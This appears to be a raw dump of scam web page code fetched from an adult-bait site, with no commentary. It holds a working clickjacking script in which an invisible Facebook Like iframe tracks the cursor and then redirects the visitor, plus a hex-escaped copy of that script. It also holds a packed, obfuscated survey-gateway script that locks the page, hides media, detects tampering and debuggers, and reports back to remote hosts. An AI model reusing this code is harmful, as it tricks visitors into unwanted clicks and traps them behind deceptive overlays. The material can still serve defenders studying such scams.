< script type =" text / javascript " > var interval ; $ ( function ( ) { interval=setInterval ( " updateActiveElement ( ) ; " , 500 ) ; } ) ; function updateActiveElement ( ) { if ( $ ( document.activeElement ) . attr ( 'id ' ) == " fbframe " ) { clearInterval ( interval ) ; iflag=1 ; document.location = " http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html " ; } } </script >
~$ GET http://allhqpics.com/bottom.js
<!-- document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E' ) ) ; //-->
< div style = " overflow : hidden ; width : 10 px ; height : 12 px ; position : absolute ; filter : alpha( opacity=0 ) ; - moz-opacity :0.0 ; - khtml - opacity : 0.0 ; opacity : 0.0 ; " id =" icontainer " > < iframe src= "
http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80 " scrolling =" no " frameborder= " 0 " style= " border : none ; overflow : hidden ; width :50 px ; height :23 px ; " allowTransparency = " true " id =" fbframe " name = " fbframe " ></iframe > </div > < script > var iflag = 0 ; var icontainer = document.getElementById('icontainer ' ) ; var standardbody =( document.compatMode==" CSS1Compat " ) ?
document.documentElement : document.body // create reference to common " body " across doctypes function mouseFollower(e ) {
/* DO NOT EDIT THIS */ if ( window.event ) { // for IE icontainer.style.top = ( window.event.y-5) +standardbody.scrollTop+'px ' ; icontainer.style.left = ( window.event.x-5) +standardbody.scrollLeft+'px ' ; } else { icontainer.style.top = ( e.pageY - 5 ) +'px ' ; icontainer.style.left = ( e.pageX - 5 ) +'px ' ; } } document.onmousemove = function(e ) { if ( iflag == 0 ) { mouseFollower(e ) ; } else { icontainer.style.display = ' none ' ; } } </script >
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html < head > < title > The Guy With The Largest Dick On The Planet </ title > < script src=" jquery.js " type = " text / javascript " ></ script > < script type =" text / javascript " src= "
http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D "></script> </head > < body > < script type =" text / javascript " > $ ( document ) .ready ( function ( ) { $ ( " a[ name^='faq - ' ] " ) .each ( function ( ) { $ ( this ).click ( function ( ) { if ( $ ( " # " + this.name ) .is ( ': hidden ' ) ) { $ ( " # " + this.name ) .fadeIn( ' normal ' ) ; $ ( " a[ name^='faq - ' ] " ) . hide ( ' normal ' ) ; } else { $ ( " # " + this.name ).fadeOut ( ' normal ' ) ; } return false ; } ) ; } ) ; } ) ; </script > < style type =" text /css " > . faq - answer { display : none ; } < style > < center > < a href= " # " name = " faq - 1 " >< img src= " pre.jpg "
></a></center > < center ></a>< div class = " faq - answer " id = " faq - 1 " >< a href= " # " name = " faq - 1 " >< img src=" hero.jpg " ></div></center > </ body >
function showme ( txt ) { document.write ( " < textarea rows=50 cols=50 > " ) ;document.write ( txt ) ; document.write ( " </ textarea > " ) ; } //Copyright 2010 CPAlead.com showme ( function ( p , a , c , k, e, d ) {e=function( c ) {return c};if (!''. replace (/^/, String ) ) {while (c--) {d[ c ] =k[c ] ||c}k=[ function(e ) {return d[e ]}];e=function ( ) {return '\\w+'};c=1};while(c--) {if(k[ c ] ){p=p.replace( new RegExp ( '\\ b '+e( c ) +' \\b ' , 'g ' ) , k[ c ] ) }}return p} ( '6 124= { " 123 " : [ { " 13 " : " 224= " , " 18 " : " 99 " , " 66 " : " 0 " } , {" 13 " : " 200= " , " 18 " : " 50 " , " 66 " : " 0 " } , {" 13 " : " 225= " , " 18 " : " 30 " , " 66 " : " 0 " } , {" 13 " : " 222= " , " 18 " : " 95 " , " 66 " : " 0 " } ]
};9 76( 7,189 ) {90 ( 6 65=0;65<124.123.97;65 ++) {4( 124.123[65 ]
.13==231(7 ) ) {153 124.123[65 ]
[ 189] }}}6 108= \'\ '; 6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175= \ '79 \ '; 6 249= \'242 246 230 228 227 62 239 240 243. \';9 251( 113 ) {6 133=19.128;4(247 19.128!=\ '9 \ ' ) {19.128=113}12{19.128=9 ( ) {4( 133 ) {241{133() }234(235 ) {}}4 ( 113 ) {113() }}}}9 114(7 ) {6 88=2.81 ( " 20 " ) .207(0 ) ; 4( 88==237 ) {59=59+300;48 ( " 114 ( \' " + 7 + " \ ' ) ; " ,300 ) }12{199(7)}}9 226(7 ) {4( 108>0 ) {59=59+108+\' 155 \'; 48 ( " 114 ( \' " + 7 + " \ ' ) ;
" ,108 + \'155 \ ') }12{59=59+300;48 ( " 114 ( \' " + 7 + " \ ' ) ; " ,300 ) }}9 177(41 ) {78=2.81 ( \' 64 \ ')
;90 ( 8=0;8!=78.97;8++) {4( 78 [ 8 ] .13 !=\ ' 24 \') {4( 41==0 ) {78[8 ] .3.33 =\'86\'}4( 41==1 ) {78[8 ] .3.33=\'47\'}}}}9 140(41 ) {6 211=2.81 ( \' 236 \ ') ;90 ( 6 209=2.211,8=0,22;22=209 [8 ]
;8++) {4(22.13 !=\' 170 \ '&&22.13 !=\ ' 159 \ ') {4( 41==0 ) {4( 195.198==\'212 220 215\ ' ) {22.73 ( \' 87 \ ' , \' 25 \ ' ) ; 22.3.33 =\'86\'}12{22.73 ( \' 87 \ ' , \' 25 \ ' ) ; 6
196=22.252,139=22.244;139.233(22 ) ;139.201( 22,196)}}4( 41==1 ) {22.73 ( \' 87 \ ' , \' 19 \ ' ) ; 4( 195.198== \'212 220 215\ ') {22.3.33=\'47\'}}}}}9 150(41 ) {49=2.81 ( \' 238\ ') ;90 ( 8=0;8!=49.97;8++ ) {4( 49 [ 8 ] .13 !=\ ' 170 \ '&&49 [ 8 ] .13 !=\ ' 159 \ ') {4( 41==0 ) {49 [8 ] .73 ( \' 87 \ ' , \' 25 \ ' ) ; 49 [ 8 ] .3.33 = \'86\'}4( 41==1 ) {49[8 ] .3.33 = \'47 \ '; 49 [ 8 ] .73 ( \' 87 \ ' , \' 19 \ ' ) }}}}9 96 ( ) { 6 68,61;4( 19.104&&19.184 ) {68=19.176+19.223;61=19.104+19.184}12 4( 2.20.183>2.20.60 ) {68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4( 137.104 ) {14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89 ) {14=2.74.98;58=2.74.89}12 4( 2.20 ) {14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263( 180,181,14,58 ) }9 141 ( ) {6 51=96 ( ) ; 4( ( 51 [ 1 ] - 2.5 ( \' 11 \ ') .3.23.218( " 130 " , " " ) ) >30 ) {2.5( \' 11 \ ') . 3.23 =( 51 [ 1 ] +\ ' 130 \ ') }4( 149==0 ) {48 ( " 141 ( ) ; " ,169) }}9 77( 7,178 ) {4( 178!=175 ) {34.213.291= \'37://71.43.46/290.72?82=83\'}6 15=2.5( \' 11 \ ' ) ; 6 26=2.5( \'35 \') ; 140 ( 1 ) ; 150(1) ; 177(1) ;149=1;102=75;4(76 ( 7 , \'66 \') ==1&&191!=75 ) {15.3.120= " 118( 18=0 ) " ; 15.3.18 = " 0.0 " ; 2.5 ( \' 24 \ ' ) .44=\'37://71.292.293/294-109.72 \';191=75}12{26.3.21=\'42 \'; 15.3.21=\'42 \ '; 2.5 ( \' 24 \ ') .44=\'289:288\ '; 2.5 ( \' 24 \ ') .
3.21=\'42\'}153 85}9 57( 174 ) {4( !102&&131 ) {4( 19.188&&19.188.185 ) {6 147=1}12{6 147=0}67=146 173( ) ;67.44="37://71.43.46/62-145.72?82=83&185= " +147 + " &145= " +174;2.20.161(67 ) ; 164( ) }}9 151( 148 ) {4( !102&&131 ) {67=146 173( ) ;67.44="37://71.43.46/62-145-283.72?82=83&148= " +148;2.20.161(67 ) ;194 ( \'37://71.43.46/282.72?82=83\') }}9 156 ( ) {4(!2.5 ( \' 11 \ ' ) ) {57(\'109-110-132\ ') }12 4(!2.5 ( \' 35 \ ' ) ) {57 ( \'62-110-132\ ') }12 4(!2.5 ( \' 24 \ ' ) ) {57(\'64-110-132\ ') }12 4( 2.5 ( \' 11 \ ') .3.17 !=" 100 % " ||2.5 ( \' 11 \ ' ) .3.21 !=" 55 " | | 2.5 ( \' 11 \ ') .3.33 !=" 47 " ) {57 ( \' 109-163\ ') }12 4( 2.5 ( \'35 \ ') .3.17 !=" 100 % " ||2.5 ( \' 35 \ ' ) .3.21 !=" 55 " | | 2.5 ( \' 35 \ ' ) .3.33 !=" 47 " ) {57 ( \'62-163\ ') }12 4( 2.5 ( \' 24 \') .3.21 !=" 55 " ) {57 ( \'64-110-47 \ ' ) }4( 2.5 ( \' 24 \') .60<=300&&2.5( \' 24 \') .60!=0 ) {151(\'64-23-158-\'+2.5( \' 24 \') .60 ) }12 4( 2.5 ( \' 11 \ ') .60 < =100&&2.5( \' 11 \') .89<=100 ) {151( \'109-23-158-\'+ 2.5 ( \' 11 \ ' ) .60+\'-\'+ 2.5( \' 11\ ') .89)}48(" 156 ( ) " ,172 ) }9 164 ( ) { 6 143= [ " \\ 168\\165\\136\\84\\134\\284 " , " \\136\\84\\167\\134\\187\\204\\84\\216 " ] ; 19 [ 143[1 ] ] [ 143[0 ] ] ( ) }9 194 ( 217 ) {6 154= [ " \\ 296\ \168\\165\\287 " , " \\136\\84\\167\\134\\187\\204\\84\\216 " ] ; 34 [ 154 [1 ] ] [ 154[0 ] ]
=217}9 219( 7 ) {2.5 ( \' 24 \ ' ) .286.213.218( \'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298 )+\'\ ') }9 214( 7 ) {6 51=96 ( ) ; 6 88=2.81 ( " 20 " ) .207(0 ) ; 6 15=2.253( " 10 " ) ; 15.73 ( \' 13 \ ' , \' 11 \ ' ) ; 15.3.21=\'42 \'; 15.3.28=\'121\ '; 15.3.34=\'0 \ '; 15.3.202=\'0 \ '; 15.3.197= \'301 \'; 15.3.17= \
'100 % \'; 88.201( 15,88.303 ) ;142=76 ( 7 , \' 18 \ ')
;92=142/100;2.5( \' 11 \ ' ) .3.120 = " 118( 18= " +142 + " ) " ; 2.5 ( \' 11 \ ') .3.18=92;15.3.23 =( 51 [ 1 ] +\ ' 130 \ ') ; 15.3.21=\'55 \'; 15.3.33=\'47 \'}9 199( 7 ) {6 106= [ \' 200%297\ '] ; 4(!2.5 ( \' 11 \' ) ) {214(7) }12{4( 2.5 ( \' 11 \ ' ) .3.21=\'42 \') {2.5( \' 11 \') .3.21=\'55\';92=76( 7 , \'18 \') /100;2.5( \' 11 \ ' ) .3.120 =" 118( 18=" +92 + " ) " ; 2.5 ( \' 11 \ ' ) .3.18=92}}6 51=96 ( ) ; 141 ( ) ; 140( 0 ) ; 150( 0 ) ; 6 26=2.5( \'35 \') ; 26.3.21=\'55 \'; 26.3.33=\'47 \'; 26.3.28=\'121\ '; 26.3.34=\'0 \'; 26.3.202=\'0 \ '; 26.3.197= \'285\'; 26.3.17= \'100 % \'; 6 144=0;90 ( 6 8=0;8<106.97;8++ ) {4( 106[8 ] ==7 | |106[8 ] ==166( 7 ) ) {6 157=76 ( 7, \'66 \') ; 4( 157==1 ) { 2.5 ( \' 129 \ ') .53 =\'< 10 3 =" 28 : 54 ; 17 : 152 ; 34 : 193 ; 63 : - 186 ; 36-39 : 38 ; 31-29 : 115 ; 52-70 : 69 ; 27-32 : 25 ; " >< 14 107= " 77 ( \\\ '\ '+ 7+\'\\\' , \\\ '79\\\ ' ) ; " 3 =" 112 : 105 ; " ><91 44="37://94.43.46/103/160-62/160-280-262-261.179 " 93 = " 0 " 101= " 111 117 " ></14></10>\'; 2.5(\' 116\ ') .53=\'< 10 3 =" 28 : 54 ; 17 : 152 ; 34 : 193 ; 63 : - 186 ; 36-39 : 38 ; 31-29 : 125 ; 52-70 : 69 ; 27-32 : 25 ; " >< 14 107= " 77 ( \\\ '\ ' + 7+\'\\\' , \\\ '79\\\ ' ) ; " 13 =" 221 " 3 =" 112 : 105 ; " >< 91 17 =" 135 " 23 = " 40 " 44 = " 37://94.43.46/103/192.182 " 93 = " 0 " 101= " 111 117 " ></14></10>\'}12{2.5(\'129\') .53=\'< 10 3 =" 28 : 54 ; 17 : 122 ; 34 : 127 ; 63 : 126 ; 36-39 : 38 ; 31-29 : 115 ; 52-70 : 69 ; 27-32 : 25 ; " >< 14 107= " 77 ( \\\ '\ '+ 7+\'\\\' , \\\ '79\\\ ' ) ; " 3 =" 112 : 105 ; " ><91 44="37://94.43.46/103/281/264.179 " 93 = " 0 " 101= " 111 117 " ></14></10>\'; 2.5(\' 116\ ') .53 =\'< 10 3 =" 28 : 54 ; 17 : 122 ; 34 : 127 ; 63 : 126 ; 36-39 : 38 ; 31-29 : 125 ; 52-70 : 69 ; 27-32 : 25 ; " >< 14 107= " 77 ( \\\ '\ ' + 7+\'\\\' , \\\ '79\\\ ' ) ; " 13 =" 221 " 3 =" 112 : 105 ; " >< 91 17 =" 135 " 23 = " 40 " 44="37://94.43.46/103/192.182 " 93 = " 0 " 101= " 111 117 " ></14></10>\'}6
144=1;132=8;260}}4(144==0 ) {2.5 ( \' 129 \ ') .53 =\'\ '; 2.5 ( \' 116 \ ') .53 =\'\'}26.3.23 =( 51 [ 1 ] +\ ' 130 \ ' ) ; 48 ( " 219 ( \' " + 7 + " \' ) ; " ,169 ) ; 2.5 ( \' 24 \ ' ) .
3.21=\'55 \'; 131=75;48 ( " 156 ( ) ; " ,255 ) }9 171( ) {119=119-1;2.5( " 256 " ) .53=119;4( 119<=0 ) {257( ) }12{48 ( " 171 ( ) " ,172)}}2.16 ( \'< 3 258="36/266 " >#11{27-32 : # 155 ; 120:118(18=80 ) ; 18 : 0.80 ; -267-18 : 0.80;}\ ' ) ; 2.16 ( \'#35 14 { 27:42;52-210:138;32:#206;36-208:42}\ ') ; 2.16 ( \'#35 91 { 93 : 162;}\') ; 2.16 ( \'#35 14:276 { 27:42;52-210:138;32:#206;36-208:275}</3>\' ) ; 2.16 ( \'< 10 13=" 35 " 3 =" 21:42 ; 36-39 : 38 ; 277-23 : 138 ; " >\' ) ; 2.16 ( \'< 10 13 =" 129 " 39 = " 38 " 3 =" 28 : 121 ; 17 : 100 % ; 31-29 : 115 ; " >\') ; 2.16 ( \'< 10 3 =" 28 : 54 ; 17 : 122 ; 34 : 127 ; 63 : 126 ; 36-39 : 38 ; 31-29 : 115 ; 52-70 : 69 ; 27-32 : 25 ; " >\') ; 2.16 (\'</10>\') ; 2.16 (\'</10>\') ; 2.16 ( \'< 10 13 =" 116 " 39 = " 38 " 3 =" 28 : 121 ; 17 : 100 % ; 31-29 : 125 ; " >\') ; 2.16 ( \'< 10 3 =" 28 : 54 ; 17 : 122 ; 34 : 127 ; 63 : 126 ; 36-39 : 38 ; 31-29 : 125 ; 52-70 : 69 ; 27-32 : 25 ; " >\') ; 2.16 (\'</10>\') ; 2.16 (\'</10>\') ; 2.16 ( \'< 10 3=" 278 : 152 279 162 ; 27 : 25 ; 23 : 274 ; 31-29 : 273 ; " >\') ; 2.16 ( \'< 64 17=" 100 % " 23 =" 269 " 13 = " 24 " 44 = " " 268= " 75 " 270 = " 0 " 3 = " 28 : 54 ; 23 : 272 ; 205-65 : 86 ; 205-271 : 86 ; 27-32 : 25 ; 31-29 : 254 ; " 259 = " 265 " ></64>\') ; 2.16 (\'</10></10>\') ;',10,304 , '||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split( '| ' ) ,0 , {} ) )
var widgetJSON = {" settings " : [ { " id " : " OTM5ODQ= " , " opacity " : " 99 " , " donation_widget " : " 0 " } , {" id " : " NzMxNTM= " , " opacity " : " 50 " , " donation_widget " : " 0 " } , {" id " : " NzM5NTQ= " , " opacity " : " 30 " , " donation_widget " : " 0 " } , {" id " : " ODA1OTE= " , " opacity " : " 95 " , " donation_widget " :
" 0 " }]};function getWidgetSetting ( gateid , settingname ) {for( var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid ) ) {return widgetJSON.settings[x][settingname]}}}var popup_delay=''; var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2'; var gmgqvtjawhodlboj8b0d5f2c='
Your attempt to disable this widget has been logged .'; function addWidgetLoadEvent ( func ) {var oldonload=window.onload;if( typeof window.onload!='function'){window.onload=func}else{window.onload=function () {if(oldonload){try{oldonload()}catch(e){}}if( func){func()}}}}function checkForBody ( gateid ) {var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName(" body " ) .item(0 ) ;if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null ){bodyloadtime=bodyloadtime+300;setTimeout(" checkForBody ( '" + gateid + " ' ) ;" ,300)}else{myGatewayStart( gateid) }}function startGateway ( gateid ) {if( popup_delay>0 ) {bodyloadtime=bodyloadtime+popup_delay +'000';setTimeout (" checkForBody ( '" + gateid + " ' ) ; " , popup_delay + '000')}else{bodyloadtime=bodyloadtime+300;setTimeout(" checkForBody ( '" + gateid + " ' ) ; " ,300 ) }}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName( 'iframe ' ) ; for( i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831') {if(onoroff==0 ) {iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var embeds=document.getElementsByTagName( 'embed ' ) ; for ( var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket '){if(onoroff==0 ) {if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute( 'wmode ' , ' transparent ') ;em.style.visibility='hidden'}else{em.setAttribute ( ' wmode ' , ' transparent ' ) ; var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em) ;pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode ' , ' window ' ) ;if( navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName( ' object ' ) ; for( i=0;i!=object_tags.length;i++) {if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket '){if(onoroff==0){object_tags[i].setAttribute ( ' wmode ' , 'transparent ') ; object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute ( ' wmode ' , ' window')}}}}function getPageSize( ) {var c , d ;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a; return arrayPageSize=new Array ( pageWidth , pageHeight , a, b) }function dontscroll ( ) {var arrayPageSize=getPageSize ( ) ;if(( arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace ( " px " , " " ) ) >30 ) {document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize [ 1 ] +'px ') }if( mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout ( " dontscroll( ) 